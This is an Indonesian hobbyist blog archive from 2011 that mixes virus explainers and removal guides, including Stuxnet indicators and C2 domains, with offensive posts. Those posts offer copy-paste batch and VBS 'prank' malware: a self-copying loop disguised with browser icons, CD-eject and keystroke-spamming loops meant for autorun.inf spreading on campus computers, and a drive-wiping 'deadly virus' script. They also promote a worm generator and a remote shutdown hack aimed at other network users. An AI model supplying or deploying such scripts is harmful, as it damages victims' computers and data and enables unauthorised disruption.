Showing posts with label Death Note. Show all posts
Showing posts with label Death Note. Show all posts

Sunday, July 24, 2011

Cara Hack Mematikan Komputer Orang Lain Untuk Menambah Kecepatan Internet


Sudah lama kita tidak berjumpa"Hhmmmm... terkadang kita merasa jengkel  ketika kita bermain internet tetapi kecepatan internet sangat lambat, itu disebabkan karena banyaknya pengguna jaringan. Timbul pikiran saya bagaimana menambah kecepatan internet saya tanpa sepengetahuan orang lain.
Nah, saya akan menambah kecepatan internet saya dengan cara mematikan komputer orang lain dari jarak jauh, tentunya orang yang akan kita mantikan komputernya berada dalam satu jaringan wireless dengan kita dan orang tersebut tidak akan mengetahui siapa yang mematikan komputernya,..(hehhee kejam ya... ini cuma untuk pembelajaran aja)"bila kalian ingin mempelajarinya lebih dalam silahkan klik Disini
Read More...

Tips Mengenal Widget Lebih Jauh


Widget adalah sebuah alat yang berguna dalam memaksimalkan keindahan serta kecantikan blog Anda. Widget sendiri merupakan sebuah elemen yang berguna dan mudah digunakan baik yang telah disediakan oleh penyedia layanan blog yang Anda gunakan maupun berasal dari pihak ketiga. Penggunaan serta pemasangan widget telah sangat dimudahkan oleh pihak-pihak penyedia layanan, sehingga yang Anda perlukan hanya mendaftar atau bahkan ada yang tidak perlu mendaftar sama sekali, cukup mengcopy script yang telah disediakan dalam element blog Anda. Berikut ini 58 widget pilihan untuk mempercantik serta memperindah tampilan blog Anda.
  • MyBlogLog’s Recent Readers – Widget ini memperlihatkan avatar dari para pengunjung blog Anda. Serta dengan kepopulerannya widget satu ini sampai-sampai manajemen MyBloglog mampu meyakinkan Yahoo untuk membeli sahamnya. Sehingga, yang Anda perlukan untuk mendapat widget ini adalah mempunyai account yahoo.   Mashable – Widget ini menyediakan semacam newsreel (headline news) dalam element blogger yang memberikan cuplikan berita/postingan dari sosial networking. Bedanya ada pilihan warna untuk disesuaikan dengan layout blog Anda.
  • Headline News – Seperti widget mashable, widget ini pun menampilkan cuplikan headline berita dari situs-situs di seluruh penjuru dunia.
  • Flickr Flash Photo Stream Badge – Widget ini menampilkan photo-photo dari profil flickr Anda secara berurutan dan dengan sentuhan flash. Flickr merupakan bagian dari yahoo jadi untuk mendapatkan widget ini Anda memerlukan account yahoo juga.
  • Preview Anywhere –Widget ini Fungsinya untuk melihat preview link keluar dengan tampilan popup yang tidak terlalu besar ketika pengunjung mengarahkan mouse pada teks atau banner yang “mengandung” link.
  • Twitter Badge – Jika dalam keseharian hidup Anda banyak hal-hal menarik dan begitu penuh warna dengan segudang aktifitas serta ingin agar orang lain tahu dan menampilkan cuplikan kalimat-kalimat pendek Anda sedang melakukan kegiatan ini, Anda sedang berada dimana, Anda sedang bersama siapa, Anda sedang, sedang, dan sedang lainnya…. Maka widget ini cocok untuk dipasang pada blog Anda. Dari pada bikin sendiri element blogger/ wordpress *secara manual* menuliskan teks sebagai pesan kepada pengunjung blog Anda bahwa Anda sedang mengerjakan ini, saya sarankan lebih baik 
  • Jikan ingin tawu lebih dalamnya silahkan klik Disini

Read More...

Wednesday, June 8, 2011

Tips Cara Membuat Virus Komputer Palsu

Membuat virus komputer palsu untuk sekedar iseng atau untuk menjaili teman anda,di jamin 100% aman dan nggak akan meninggalkan kerusakan pada komputer yang menjalankan script ini, tapi mungkin bisa meninggalkan lebam ato bekas tangan diwajah anda :P . so Take Your Own Risk !!!!




 
virus 1
pertama buka notepad kemudian ketik
@echo off
echo checking system:

echo for %%i in (“*.bat”) do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
echo FAILED TO DELETE THE VIRUS
pause
echo CONTACTING THE ANTIVIRUS
pause
echo FAILED
pause
echo FAILED
:1
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat
goto 1


save as virus.bat di desktop atau yang lainnya, ekstensinya harus .bat, kemudian ganti icon-nya, yaitu dengan cara klik kanan, klik properties cari icon yang diinginkan, lebih baik pakai iconnya IE atau FF sesuaikan namanya. tapi sebelumnya buat shortcut ke program virus palsu tadi. klik kanan shortcut klik properties ganti iconnya.
untuk menghentikan virus palsu tadi dengan cara tekan Ctrl+C, atau menggunakan taskmanager.
virus2
Ini virus jadi-jadian yang paling OK tinggal kalian download di SINI, unzip, buat shortcutnya di desktop dan ganti iconnya denganicon aplikasi yang sering digunakan misalnya browser, winamp, WMP, YM dll. Virus ini nggak bisa di stop namun akan berhenti sendiri setelah beberapa menit,,,teng teng Read More...

Cara Uninstall Fake Antivirus Windows XP 2011 (Antivirus Palsu Pada Windows XP)

Kali ini saya akan berbagi pengalaman tentang antivirus palsu pada windows xp, kalo gak salah namanya XP Antivirus 2011. Teman saya pernah kena antivirus ini. Awal mulanya sih gara-gara browsing gak jelas, tiba-tiba disalah satu web ada peringatan, gak tau apa tulisanya. Soalnya pake bahasa inggris, tapi intinya sih nangkep kalo gak salah " Komputer anda telah terjangkit spyware dan virus, untuk mengantisipasinya, anda dapat menggunakan program ini " kalo gak salah sih itu intinya. hehehehe.
Temenku secara polosnya langsung install aja, nah setelah selesai nginstall dia scan secara otomatis, dan banyak sekali file-file yang kena spyware n virus. Nah dya bingung mw delete, filenya penting-penting. akhirnya dia restart komputer.Setelah restart komputer, ada perubahan yang terjadi, ternyata task manager di block, firewall juga di block. dan hampir semua program administrator di blok.
Ciri-ciri :

  • Pas teman-teman selesai booting, ada startup Windows Security center
  • Trus muncul XP antivirus 2011
  • Di safe mode dia masih tetap bisa jalan
  • Gak bisa buka mozilla
  • Setiap buka IE, Antivirus palsu ini selalu muncul 

Cara menanganinya :

Karena task manager di blok, teman-teman bisa mengembalikan task manager dengan cara ini, atau bisa manggunakan SMADAV di Tools > Process Manager

Lalu cari proses yang mencurigakan, kalo gak salah sih programnya "kfs.exe", setiap di kill, pasti dia akan jalan lagi, gak tau gak kapok-kapok dia.

Langsung aja, open file location. Langsung delete aja tuh program. setelah itu restart komputer dan taraaaa, Fake Antivirus XP 2011 udah ilang.

Read More...

Tuesday, June 7, 2011

Apa yang di maksud dengan virus komputer,,,,????

Apa itu virus?Virus atau worm adalah suatu program komputer yang dapat menyebar pada komputer atau jaringan dengan cara membuat copy dari dirinya sendiri tanpa sepengetahuan dari pengguna komputer tersebut. Virus dapat menimbulkan efek yang berbahaya, misalnya mulai dari menampilkan pesan, mencuri data atau bahkan mengontrol komputer Anda dari jarak jauh.
Bagaimana virus menginfeksi komputer?
Suatu virus pertama kali harus dijalankan sebelum ia mampu untuk menginfeksi suatu komputer. Ada berbagai macam cara agar virus ini dijalankan oleh korban, misalnya dengan menempelkan dirinya pada suatu program yang lain. Ada juga virus yang jalan ketika Anda membuka suatu tipe file tertentu. Kadangkala virus juga memanfaatkan celah keamanan yang ada pada komputer Anda (baik sistem operasi atau aplikasi), dengan memanfaatkan hal-hal tersebut virus dapat berjalan dan kemudian akan menyebarkan dirinya sendiri secara otomatis.Anda juga dapat menerima suatu file yang sudah terinfeksi virus dalam attachment e-mail Anda. Begitu file tersebut Anda jalankan, maka kode virus akan berjalan dan mulai menginfeksi komputer Anda dan bisa menyebar pula ke semua file yang ada di jaringan komputer Anda.
Trojan horse
Trojan horse adalah program yang kelihatan seperti program yang valid atau normal, tetapi sebenarnya program tersebut membawa suatu kode dengan fungsi-fungsi yang sangat berbahaya bagi komputer Anda.
Sebagai contoh, virus DLoader-L datang dari attachment e-mail dan dianggap sebagai sebagai suatu update program dari Microsoft untuk sistem operasi Windows XP. Jika Anda menjalankannya maka dia akan mendownload program dan akan memanfaatkan komputer Anda untuk menghubungkan komputer Anda ke suatu website tertentu. Targetnya tentu saja untuk membuat website tadi menjadi overload dan akhirnya tidak bisa diakses dengan benar oleh pihak lain. Ini sering dinamakan dengan serangan denial of service atau DoS.
Trojan tidak dapat menyebar secepat virus karena trojan tidak membuat copy dari dirinya sendiri secara otomatis. Tapi sejalan dengan perkembangan virus, maka trojan horse bisa bekerjasama dengan virus dalam hal penyebarannya. Virus dapat melakukan download terhadap trojan yang merekam keystroke keyboard Anda atau mencuri informasi yang ada pada komputer Anda. Di sisi lain, trojan juga digunakan untuk menginfeksi suatu komputer dengan virus.
Worms
Worm bisa dikatakan mirip dengan virus tetapi worm tidak memerlukan carrier dalam hal ini program atau suatu dokumen. Worm mampu membuat copy dari dirinya sendiri dan mengunakan jaringan komunikasi antar komputer untuk menyebarkan dirinya. Banyak virus seperti MyDoom atau Bagle bekerja sebagaimana layaknya worm dan menggunakan e-mail untuk mem-forward dirinya sendiri kepada pihak lain.
Apa yang bisa dilakukan oleh virus?
Virus seringkali mengganggu Anda atau menghentikan kerja komputer Anda pada saat diperlukan. Sejalan dengan perkembangan di dunia virus komputer maka sampai saat ini efek dari virus ini sudah semakin banyak, yaitu:
  • Memperlambat e-mail
    Virus dapat menyebar melalui e-mail, seperti virus Sobig, dan mampu untuk membuat trafik e-mail yang sangat besar yang tentu saja akan membuat server menjadi lambat atau bahkan menjadi crash. Bahkan jika hal tersebut tidak sampai terjadi, perusahaan yang merasa terganggu dengan insiden ini toh juga akan mematikan servernya.
  • Mencuri data konfidental
    Worm Bugbear-D contohnya, mampu merekam keystroke keyboard Anda, termasuk password dan lain sebagainya. Rekaman tadi biasanya akan dikirim ke si pembuat virus untuk dimanfaatkan lebih lanjut.
  • Menggunakan komputer Anda untuk menyerang suatu situs
    MyDoom contohnya, dia menginfeksi banyak komputer di seluruh dunia untuk menyerang situs SCO dengan traffic data yang sangat besar. Ini akan membuat situs tersebut akan terbebani luar biasa dan akhirnya akan crash dan tidak bisa melayani pengguna lainnya. Ini biasa dinamakan dengan denial of service.
  • Membiarkan orang lain untuk membajak komputer Anda
    Beberapa virus menempatkan trojan backdoor pada komputer dan ini akan membuat si pembuat virus dapat terhubung ke komputer tersebut secara diam-diam dan bisa dimanfaatkan lebih lanjut sesuai dengan keinginannya.
  • Merusak data
    Virus Compatable contohnya, dapat membuat perubahan pada data yang Anda simpan pada dokumen MS Excel.
  • Menghapus data
    Virus Sircam contohnya, berusaha untuk menghapus atau meng-overwrite hardisk Anda pada suatu waktu tertentu yang tidak terduga.
  • Men-disable hardware
    Virus CIH atau Chernobyl contohnya, berusaha untuk meng-overwrite chip BIOS pada tanggal 26 April dan akan membuat komputer Anda menjadi tidak berfungsi.
  • Menimbulkan hal-hal yang aneh dan mengganggu
    Virus worm Netsky-D contohnya, dapat membuat komputer berbunyi beep secara spontan atau tiba-tiba untuk beberapa jam lamanya.
  • Menampilkan pesan tertentu
    Virus Cone-F contohnya, akan menampilkan pesan berbau politik jika bulan menunjukkan bulan Mei.
  • Merusak kredibilitas Anda
    Jika virus mem-forward dirinya sendiri dari komputer Anda ke komputer pelanggan Anda atau komputer rekan bisnis Anda, maka hal ini akan merusak reputasi Anda sebagai suatu organisasi dan mereka akan tidak mau lagi melanjutkan hubungan bisnis dengan Anda atau malah menuntut kompensasi dari pihak Anda.
  • Membuat malu Anda
    Virus PolyPost contohnya, akan memposting dokumen dan nama Anda pada newsgroup yang berbau pornografi.
Read More...

CARA MEMBUAT VIRUS WORM DENGAN MUDAH

Kamu pasti inget dengan virus yang bernama worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book,Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.
Aplikasi tersebut dapat di download di bawah ini :

Read More...

Cara membuat Virus Nakal

Mari kita sama-sama membuat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.Caranya: 




Buka notepad dan masukkan code berikut ini "

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop




Selanjutnya,simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.
PERHATIAN: misalkan kalian pada males atau gak tau cara copasnya. download ajah filenya yang sudah jadi di SINI

Nah ada yang mau script .vbs yang laen gak,silahkan copy script ini?
WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop
 
Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik?
ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as
 













Kode Vbs ini akan membuat user terus mengetikkan kata2 “Kamu emang jelek koq!” :D
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop
Dan membuat terus menerus menekan tombol “Enter”
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep  100
wshshell.sendkeys "~(enter)"
loop
Terus tekan backspace:
MsgBox "Balik lagi ah...saltik"
Set wshShell  =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys  "{bs}"
loop

Read More...

Cara Membuat Virus Mematikan

Virus yang akan kita buat kali ini adalah virus yang bisa dikatakan jauh lebih mematikan dari pada virus - virus lainnya. Mungkin cara ini cukup ekstrem untuk dipraktikan. Jadi, jangan sampai artikel ini disalah gunakan.
Langsung saja, buka notepad dan ketikkan script berikut ini :

@echo off
DEL C: -Y
DEL D: -Y



Kemudian simpan, lalu ubah [Save as type] menjadi [All Files], dan pada kotak [File Name] beri nama virus ini dengan kata apa saja terserah Anda dan diakhiri dengan kata .bat, misal virus.bat , kemudian klik save.

PERHATIAN,,,!!!!
Setelah file ini disimpan, JANGAN DIKLIK!!!

Virus ini adalah virus yang sangat mematikan, bila anda mengklik virus ini, maka seluruh data yang ada di hardisk anda akan hilang tanpa terkecuali. Sehingga, hal ini dapat menyebabkan komputer Anda akan mati total. Untuk sampel virusnya bisa langsung download DI SINI jika tidak ingin memakai cara copy paste diatas.
Read More...

Sunday, May 29, 2011

Membersihkan Virus OnlineGames

Virus komputer semakin merajalela dan semakin banyak jenisnya saja. mereka dapat menyebar dan menyerang komputer kita melalui apapun. Dan Anda pastinya tidak ingin komputer Anda terserang virus dan data penting Anda akan hilang karena virus itu bukan? Salah satu virus yang dapat melakukan hal ini adalah virus OnlineGames.  
Virus OnlineGames ini dapat menginfeksi komputer kita melalui eksekusi atau instalasi program maupun software, untuk itu hindari eksekusi atau instalasi program atau software yang tidak dikenal. Selain itu Anda juga perlu berhati-hati terhadap forum online di internet yang menyediakan link-link mencurigakan.

Jika komputer Anda sudah terlanjur terinfeksi virus yang termasuk dalam jenis Trojan ini, Anda sebaiknya segera membersihkannya,sebelum Trojan ini terlanjur mencuri data-data penting Anda. Dan untuk membersihkan virus Onlinegames ini, berikut langkah-langkah yang harus Anda lakukan.

Langkah-Langkah Membersihkan Virus OnlineGames:


  1. Matikan System Restore (XP/ME), jika sedang digunakan
  2. Buka Windows Task Manager dan hentikan/matikan proses virus
  3. End Process pada file virus yang aktif (liser.exe)
  4. Hapus string registry yang telah dibuat oleh virus. Gunakan script di bawah untuk mempermudah proses penghapusan,terlebih dahulu download scriptnya di sini,selanjutnya Gunakan script yang tadi kita download dan copy script tersebut ke notepad dan simpan dengan nama “Repair.inf” dan pastikan Save As Type di All File.
  5. Kemudian hapus file virus (liser.exe & liser.dll) secara manual, yaitu pada folder "C:\Program Files\Manson" atau dapat menggunakan tools Norman Malware Cleaner. Untuk download tools ini silahkan klik disini.
Read More...

Thursday, May 26, 2011

Ciri - Ciri Komputer Terinfeksi Stuxnet


Pada kali ini saya akan membahas apa yang di maksud dengan  virus stuxnet dan bagaimana cara mengatasinya. Namun ternyata penyebarannya malware ini semakin merajalela. Sedikit mengingat sebelumnya, bahwa stuxnet mampu menembus keamanan platform berbasis SCADA, dan saat ini Stuxnet dilaporkan juga menyerang komputer berbasis Windows. Stuxnet bisa menyerang ke komputer pribadi berbasis Windows Vista dan Windows 7.


Kalau sudah begitu, sepertinya kita patut mengetahui bagaimana ciri-ciri atau tanda-tanda bagaimana komputer sudah terserang virus yang berbahaya ini. Stuxnet bisa membuat komputer tidak berfungsi secara normal, bahkan malware ini bisa saja mengacak-acak data atau mencuri informasi penting dari komputer kita .Nah, agar tidak menyesal di kemudian hari, kita perlu mengetahui tanda-tanda komputer terinfeksi Stuxnet ini, jadi kita bisa segera melakukan tindakan terbaik jika komputer kita terserang Stuxnet.

Tanda-tanda komputer terinfeksi Stuxnet

Gejala & Efek Virus
  1. Install driver baru (replace driver lama) Saat Worm Stuxnet sudah menginfeksi, worm akan mencoba menghapus drive dari Realtek atau Jmicron dan menggantinya dengan driver yang baru versi worm Stuxnet. Stuxnet menginstall driver menggunakan 2 file virus yaitu : MRXCLS.SYS dan MRXNET.SYS.
  2. Mematikan aktivitas Print Share Worm menginjeksi file spoolsv, sehingga aktivitas print (cetak data) menjadi terhenti. Komputer yang terinfeksi tidak akan bisa melakukan print. Sebagai ganti dari aktivitas print tersebut worm membuat 2 file yaitu :
    - C:-WINDOWS-system32-winsta.exe (file utama worm Stuxnet)
    - C:-WINDOWS-system32-wbem-mof-sysnullevnt.mof
  3. Low Disk Space, ini adalah akibat dari aktivitas print yang dipaksakan, sehingga membuat file winsta akan semakin membegkak dan membuat space hardisk Anamejasi habis. Dan tentunya akanada peringatan Low diskSpace dari Windows.
  4. Gejala di atas berkaitan juga dengan gejala yang lainya, dengan membengkaknya file Winsta dan menjadikan space harddisk menjadi semakin habis, maka Anda tidak bisa menyimpan data atau menjalankan program tertentu. Karena space hardisk sudah dihabiskan oleh file winsta yag membengkak.
  5. Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. File sistem Windows yang akan menjadi sasaran injeksi worm Stuxnet yaitu :
    - C:-WINDOWS-system32-svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus) 
    - C:-WINDOWS-system32-lsass.exe (file sistem yang berhubungan dengan aktivitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
  6. Melakukan koneksi ke Remote Server Worm Stuxnet, melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu :
    - www.premierfutbol.com - www.todaysfutbol.com
  7. Stuxnet juga melakukan hal yang sama seperti Conficker yaitu membuat file Scheduled Task, tujuannya yaitu agar dapat aktif da menginfeksi komputer.


File Worm Stuxnet
Saat worm Stuxnet dijalankan, worm akan melakukan hal-hal berikut ini:
  1. Menginjeksi beberapa file sistem Windows yaitu :
    - C:-WINDOWS-system32-lsass.exe
    - C:-WINDOWS-system32-svchost.exe
    - C:-WINDOWS-system32-spoolsv.exe
  2. Membuat 2 file driver yaitu :
    - C:-WINDOWS-system32-driver-mrxcls.sys
    - C:-WINDOWS-system32-driver-mrxnet.sys
  3. Membuat file konfigurasi yaitu :
    - C:-WINDOWS-inf-oem6c.pnf
    - C:-WINDOWS-inf-oem7a.pnf
    - C:-WINDOWS-inf-mdmeric3.pnf
    - C:-WINDOWS-inf-mdmcpq3.pnf
  4. Serta 2 file yang lain yaitu:
    - C:-WINDOWS-system32-KERNEL32.DLL.ASR.xxx atau SHELL32.DLL.ASR.xxx
    - C:-addins-DEFRAG[angka_acak].TMP
  5. Selain itu membuat file schedule task yaitu :
    - C:-WINDOWS-Tasks-At1.job
  6. Saat menginfeksi file spoolsv.exe, worm membuat 2 file kembali yaitu :
    - C:-WINDOWS-system32-winsta.exe (file inilah yang jika aktif akan semakin mengembang / membengkak ukurannya)
    - C:-WINDOWS-system32-wbem-mof-sysnullevnt.mof
  7. Pada removable disk/drive akan membuat beberapa file yaitu :
    - Autorun.inf
    - Copy of Shortcut.lnk
    - Copy of Copy of Shortcut.lnk
    - Copy of Copy of Copy of Shortcut.lnk
    - Copy of Copy of Copy of Copy of Shortcut.lnk
    - ~WTR[angka_acak].tmp
    -~WTR[angka_acak].tmp


Modifikasi Registry
Stuxnet juga melakukan modifikasi registry, dan diantaranya adalah sebagai berikut:

- Menambah Registry
HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Services-MRxCls HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Services-MrxNet HKEY_LOCAL_MACHINE-SYSTEM-ControlSet001-Services-MrxNet HKEY_LOCAL_MACHINE-SYSTEM-ControlSet001-Services-MRxCls HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Enum-Root-LEGACY_MRX HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Enum-Root-LEGACY_MRXNET HKEY_LOCAL_MACHINE-SYSTEM-ControlSet001-Enum-Root-LEGACY_MRXCLS HKEY_LOCAL_MACHINE-SYSTEM-ControlSet001-Enum-Root-LEGACY_MRXNET

Metode Penyebaran

Removable drive / disk Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. Worm (memanfaatkan celah autoplay) membuat beberapa file agar menginfeksi komputer yaitu :

1. Autorun.inf
2. Copy of Shortcut.lnk
3. Copy of Copy of Shortcut.lnk
4. Copy of Copy of Copy of Shortcut.lnk
5. Copy of Copy of Copy of Copy of Shortcut.lnk
6. ~WTR[angka_acak].tmp
7. ~WTR[angka_acak].tmp

Selain itu, dengan memanfaatkan celah keamanan MS10-046 (Windows Icon handler) maka file shortcut/LNK akan langsung dieksekusi pada saat drive tersebut diakses.

Jaringan Metode ini dengan memanfaatkan celah keamanan dari sistem Windows yaitu :
  1. MS08-067 (Windows Server Service), seperti hal-nya Conficker memanfaatkan celah ini dengan melakukan akses C$ dan ADMIN$
  2. MS10-061 (Windows Print Spooler), memanfaatkan printer sharing worm menginfeksi pengguna komputer yang mencoba akses ke printer server.
Read More...

Monday, May 23, 2011

Membaca Buku dan Majalah Secara Online dengan menggunakan GooReader

Sebelum dunia Internet menjadi semakin maju dan lengkap, kita harus membeli atau meminjam majalah ataupun buku yang ingin kita baca. Namun, sekarang kita dapat dengan mudah menemukan banyak sekali buku dan majalah yang dapat kita baca secara online.Dengan Google Books, kita dapat menemukan jutaan buku serta majalah yang dapat kita baca secara gratis. Untuk menemukan buku yang ingin kita baca pun sangat mudah, karena kita dapat menggunakan fitur search yang disediakan. Memang, tidak semua buku ataupun majalah dapat kita baca secara keseluruhan. Banyak dari buku serta majalah di Google Books yang hanya merupakan preview.

Namun jika kita jeli dalam mencari, kita dapat menemukan banyak buku yang dapat kita baca, atau bahkan kita unduh secara keseluruhan.Membaca buku dan majalah secara online sangatlah mudah, dan aplikasi GooReader membuatnya menjadi semakin mudah. GooReader adalah desktop application yang memungkinkan kita untuk mencari, mengunduh, dan membaca buku serta majalah yang dapat kita temukan di Google Books, tanpa harus surfing menggunakan web browser. Antar muka GooReader membuat membaca buku dan majalah secara online menjadi jauh lebih nyaman. Kita dapat membuka halaman demi halaman dengan gerakan mouse yang natural dan halus.Apikasi GooReader ini tersedia dalam versi free serta paid di situs resmi nya GooReader.com. Tentu saja, versi free memiliki fitur yang terbatas apabila dibandingkan dengan versi paid. Namun, versi free aplikasi ini cukup membantu bagi mereka yang suka membaca buku ataupun majalah secara online di Google Books. Aplikasi ini dapat digunakan di komputer yang menggunakan sistem operasi Windows XP, Vista, dan Windows 7 dengan .Net Framework 3.5 SP1.

Silahkan Download di sini -DONWLOAD NOW-
Read More...

Saturday, May 21, 2011

BELAJAR MEMBUAT ANTIVIRUS SENDIRI (MANDIRI)


Kurang puas dengan antivirus yang Anda gunakan?, atau sekedar penasaran dengan cara membuat antivirus? Jika memang benar demikian kenapa tidak mencoba membuat antivirus sendiri? Pasti lebih asyik, selain menambah pengetahuan kita tentang antivirus juga untuk mengisi waktu-waktu senggang dengan mencoba bermain-main dengan virus, sehingga diharapkan tidak ada lagi ketakutan yang berarti akan virus komputer.

Dalam pemrograman antivirus memang sangat dibutuhkan pengetahuan tentang alghoritma, dimana hal ini penting untuk membangun engine detektor virus, misalnya
seperti menggunakan alghoritma kalkulasi CRC atau MD5 sebagai engine detektornya. Lalu permasalahannya apa? Apakah Anda sudah cukup mengetahui tentang alghoritma yang dipakai dan tehnik yang digunakan untuk mendeteksi virus? Saya yakin belum banyak yang mengetahuinya lebih-lebih pada tehniknya, sekalipun Anda seorang programmer, mengapa? Karena walaupun Anda menguasai berbagai macam alghortima, tetapi belum tentu Anda mengetahui cara menjadikan alghoritma tersebut menjadi engine antivirus, karena selain membutuhkan pengetahuan tentang alghoritma Anda juga membutuhkan paling tidak sedikit pemahaman tentang struktur file eksekutabel. Sedangkan struktur eksekutabel akan tampak rumit untuk dipelajari bagi yang masih awam lebih-lebih yang masih belum tahu apa-apa tentang komputer.

Saya akan memberikan beberapa contoh yang mudah dan sederhana dalam membuat antivirus. Berbahagialah karena disini Anda tidak harus mengetahui banyak tentang alghoritma-alghoritma yang sulit, Anda cukup mengetahui sedikit tentang dasar-dasar pemrograman baik menggunakan bahasa Visual Basic, C, C++ atau Delphi. Kok bisa? Ya karena saya telah membangun engine ansav yang saya buat dalam bentuk file DLL (Dynamic Link Library) khusus saya buat untuk mempermudah membuat antivirus sendiri. File tersebut bisa di download di sini.


Sedikit tentang file DLL ini
File DLL yang saya buat ini mengandung engine virus detektor yang digunakan antivirus ansav untuk mendeteksi virus-virus lokal masa kini. Anda bisa dengan mudah menggunakan fungsi-fungsi yang ada pada file DLL ini untuk mendeteksi virus, contoh untuk memeriksa apakah suatu file merupakan virus, Anda hanya perlu membuat perintah seperti format berikut :
CheckWithAnsav(FileYangDicek, NamaVirus, BesarTampungan)
Sedangkan contoh penggunaanya seperti berikut :
retval = CheckWithAnsav (“C:\readme.txt”,Buffer,nSize)
Analisa :
Fungsi CheckWithAnsav akan mencoba memeriksa file “readme.txt” yang terletak pada drive “C:\”, apabila file “readme.txt” mengandung virus maka nilai pengembalian dari fungsi tersebut akan berupa nilai 1 yang pada contoh listing diatas diletakkan pada variabel “retval”, sebaliknya nilai pengembalian akan berupa 0 apabila file tidak mengandung virus. Lalu Buffer dan nSize pada listing diatas itu apa? Buffer adalah tampungan yang nantinya berisi nama virus yang terdeteksi apabila file “readme.txt” mengandung virus, tetapi tampungan ini akan kosong apabila virus tidak terdeteksi (file bersih), sedangkan nSize adalah jumlah karakter pada Buffer. Jadi apabila file “readme.txt” mengandung virus “gombal” misalnya maka Buffer akan birisi text “W32/Gombal” dan nSize akan berisi nilai 10 (jumlah dari karakter “W32/Gombal”).
Mudah bukan?
